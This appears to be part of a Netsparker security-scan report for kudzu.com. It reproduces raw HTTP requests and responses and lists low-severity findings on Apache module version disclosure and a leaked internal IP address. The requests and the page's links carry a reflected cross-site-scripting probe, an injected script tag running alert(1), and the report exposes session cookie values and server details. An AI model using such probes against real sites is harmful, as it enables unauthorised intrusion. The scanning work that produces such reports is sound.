Set-Cookie: logs=174.36.218.2.1326979536100593; path=/; expires=Sun, 14-Jul-24 13:25:36 GMT,JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; Path=/,locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=16.093470878864444">

..
Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /controller.jsp

/controller.jsp

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Extracted Version

mod_jk/1.2.26

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:25:36 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: logs=174.36.218.2.1326979536100593; path=/; expires=Sun, 14-Jul-24 13:25:36 GMT,JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; Path=/,locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=16.093470878864444">

..
[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.

Classification

PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
- /controller.jsp

/controller.jsp

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Extracted IP Address(es)

10.213.166.131

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:25:36 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: logs=174.36.218.2.1326979536100593; path=/; expires=Sun, 14-Jul-24 13:25:36 GMT,JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; Path=/,locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
